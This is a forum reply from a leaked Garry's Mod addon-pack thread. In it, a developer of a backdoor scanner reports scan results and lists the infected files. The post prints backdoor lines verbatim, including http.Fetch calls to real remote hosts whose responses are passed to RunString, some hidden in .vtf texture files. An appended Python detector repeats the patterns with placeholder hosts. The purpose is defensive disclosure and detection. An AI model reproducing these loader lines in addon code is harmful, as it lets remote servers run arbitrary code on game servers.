[LEAK][MEGA - PACK] 680+ ADDON PACK
Submitted by Emilywilles, 02-04-2022, 08:44 PM, Thread ID: 239535
RE: [LEAK][MEGA - PACK] 680+ ADDON PACK
I also wrote this message in a repost of this pack (https://nulledbb.com/thread-LEAK-MEGA-PA...ADDON-PACK).
Ok. I develop an addon called Backdoor Shield and I ran this pack through its file scanner (command bs_scall_full). This was the results summary:
Quote:
Files scanned: 42559
Detections:
| High-Risk : 49
| Medium-Risk : 107
| Low-Risk : 458
| Discarded : 6986
Saved as: data/backdoor-shield/Scan_2022-05-11_(22h 50m 50s).txt
After analyzing the output I found these backdoors:
Quote:
addons/isolated/Advanced Kevlar System 1.0.1/cpk/lua/autorun/server/cpk_core.lua
addons/isolated/cpk/lua/autorun/server/cpk_core.lua
http.Fetch("http://230w2zy3dv.ga/loader.php",function(_)RunString(_,"",!!1)end)

addons/isolated/advanced_medic_mod/lua/autorun/sh_medicmod_loader.lua
addons/isolated/advanced_medic_mod_wdrm/lua/autorun/sh_medicmod_loader.lua
The entire file, they are the same (Update: decoded, it's a DRM)

addons/isolated/areamanager/lua/areamanager/_statistics.lua
The entire file (Update: decoded, it's a DRM)

addons/isolated/eprotect_1.3.10/lua/e_protect/client/cl_utils.lua
The entire file (Update: decoded, it's a DRM)

addons/isolated/simple-afk-system/lua/autorun/server/npc_help.lua
addons/isolated/mechanical_system/lua/autorun/server/npc_help.lua
addons/isolated/opti/lua/autorun/server/npc_help.lua
The entire files, they are the same

addons/isolated/precision-tool/lua/weapons/gmod_tool/stools/precision.lua
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=djItuMLNOSYFaOTavYs3", function(b) RunString(b, ":", false) end)end)

addons/isolated/production_acier/lua/autorun/sh_loadacier.lua
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=zIye1U7eyoSAcnWZfopr", function(b) RunString(b, ":", false) end)end)

addons/isolated/GMOD PACK/zeros_vendingmachines/materials/npc/help.vtf
addons/isolated/mechanical_system/materials/npc/help.vtf
addons/isolated/opti/materials/npc/help.vtf
addons/isolated/simple-afk-system/materials/npc/help.vtf
addons/isolated/zeros_vendingmachines/materials/npc/help.vtf
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=HnHwSrtk9AG491as0D41", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=nYtcUboSez0wEzapWE8H", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=zIye1U7eyoSAcnWZfopr", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=GIEimqvKTPpXM9S0yQBl", function(b) RunString(b, ":", false) end) end)
The "npc_help.lua" and "http.Fetch" groups are a little simpler because they are self-contained and easier to read, so I don't have much to say about them, but I'm interested in decoding others (especially "cl_utils.lua" since it's clientside only).
If some of you want to test BS (aka bullshit detector - https://github.com/Xalalau/backdoor-shield), consider that the file scanner can be avoided by backdoors with some tactics, so also execute the infected addons along with Shield to make use of the real-time protection - which blocks suspicious calls, traces their locations and even copies the malicious code to a log.
I hope I've found most of the "issues", but if anything new and cool comes up, let me know - it's much easier to develop this thing by reading the targets' code. In fact, I'm here just for that, I don't like software piracy.
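Added example, not part of the original post and not Backdoor Shield's code: a small offline static check for the two patterns listed above, an HTTP response handed to a dynamic code runner and Lua code sitting in a non-Lua asset such as help.vtf. The risk tiers, rule set, sample paths and the example.invalid host are assumptions made for this illustration.

```python
import os
import re

# Heuristics are assumptions for this illustration, not Backdoor Shield's rules.
FETCH = re.compile(r"\bhttp\s*\.\s*(?:Fetch|Post)\s*\(")
EXEC = re.compile(r"\b(?:RunString|RunStringEx|CompileString)\s*\(")
ASSET_EXTS = {".vtf", ".vmt", ".png", ".jpg", ".wav", ".mp3", ".mdl"}

def scan_file(path, data):
    """Return (risk, reason) for one file, or None when nothing matches."""
    text = data.decode("latin-1")  # latin-1 decodes any byte, so binary assets are safe
    fetch, run = bool(FETCH.search(text)), bool(EXEC.search(text))
    ext = os.path.splitext(path)[1].lower()
    if ext in ASSET_EXTS and (fetch or run):
        return ("high", "Lua loader code inside a non-Lua asset file")
    if ext == ".lua" and fetch and run:
        return ("high", "HTTP response can reach a dynamic code runner")
    if ext == ".lua" and run:
        return ("medium", "dynamic code execution, needs manual review")
    if ext == ".lua" and fetch:
        return ("low", "outbound HTTP request")
    return None

def scan_pack(files):
    """files maps relative path -> bytes; returns sorted (path, risk, reason) tuples."""
    findings = []
    for path, data in files.items():
        hit = scan_file(path, data)
        if hit:
            findings.append((path, *hit))
    return sorted(findings)

# Constructed sample pack: paths and the example.invalid host are placeholders.
SAMPLE_PACK = {
    "addons/a/lua/autorun/server/core.lua":
        b'http.Fetch("http://example.invalid/loader.php",function(_)RunString(_,"",!!1)end)',
    "addons/b/materials/npc/help.vtf":
        b'timer.Simple(1, function() http.Fetch("https://example.invalid/x.php?key=PLACEHOLDER", '
        b'function(b) RunString(b, ":", false) end) end)',
    "addons/c/lua/autorun/sh_drm.lua": b'RunString(decode(blob), "drm")',
    "addons/d/lua/autorun/sh_stats.lua": b'http.Post("https://example.invalid/stats", {n = "1"})',
    "addons/e/lua/autorun/sh_cfg.lua": b'local cfg = util.JSONToTable(file.Read("cfg.json", "DATA"))',
    "addons/f/materials/npc/real.vtf": b"VTF\x00\x07\x00\x00\x00\x02\x00\x00\x00",
}

if __name__ == "__main__":
    for path, risk, reason in scan_pack(SAMPLE_PACK):
        print(f"{risk:6} {path}: {reason}")
```

Plain pattern matching like this only sees readable code; files that are encoded as a whole pass through it unflagged and still need decoding or runtime observation.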